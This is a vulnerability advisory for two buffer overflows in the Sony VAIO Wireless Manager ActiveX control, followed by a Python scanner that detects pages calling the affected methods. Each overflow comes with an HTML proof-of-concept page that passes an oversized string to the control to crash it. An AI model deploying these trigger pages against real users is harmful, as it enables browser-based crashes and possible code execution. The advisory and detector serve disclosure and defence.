High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on a vulnerable system.
1.1 The method SetTmpProfileOption() in the WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, "X")
arg3="defaultV"
ctrl.SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
1.2 The method ConnectToNetwork() in the WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, "X")
ctrl.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>
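For defenders, a static check that flags HTML pages which load this control and call either affected method, as an added example that is not part of the original advisory. The CLSID and method names are taken from the PoCs above; `ControlScanner`, `scan` and the sample page are constructed here for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and method names come from the advisory; everything else is illustrative.
CLSID = "92E7DDED-BBFE-4DDF-B717-074E3B602D1B"
METHODS = ("SetTmpProfileOption", "ConnectToNetwork")

class ControlScanner(HTMLParser):
    """Records <object> tags bound to CLSID and gathers all script text."""
    def __init__(self):
        super().__init__()
        self.instantiated = False
        self.object_ids = set()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and CLSID.lower() in a.get("classid", "").lower():
            self.instantiated = True
            if a.get("id"):
                self.object_ids.add(a["id"])
        if tag == "script":
            self._in_script = True
        # Inline handlers (onclick= and similar) also carry script.
        self.scripts += [v for k, v in a.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan(html):
    """Return (control instantiated?, advisory methods called on it)."""
    s = ControlScanner()
    s.feed(html)
    s.close()
    code = "\n".join(s.scripts)
    called = {m for i in s.object_ids for m in METHODS
              if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(i), m), code, re.I)}
    return s.instantiated, sorted(called)

# Constructed sample page with a short, harmless argument.
SAMPLE = """<html><body>
<object id=wm classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<script language="VBScript">wm.ConnectToNetwork 1, "home"</script>
</body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The check is static: it sees only `<object>` tags and script text present in the markup, not objects created at run time.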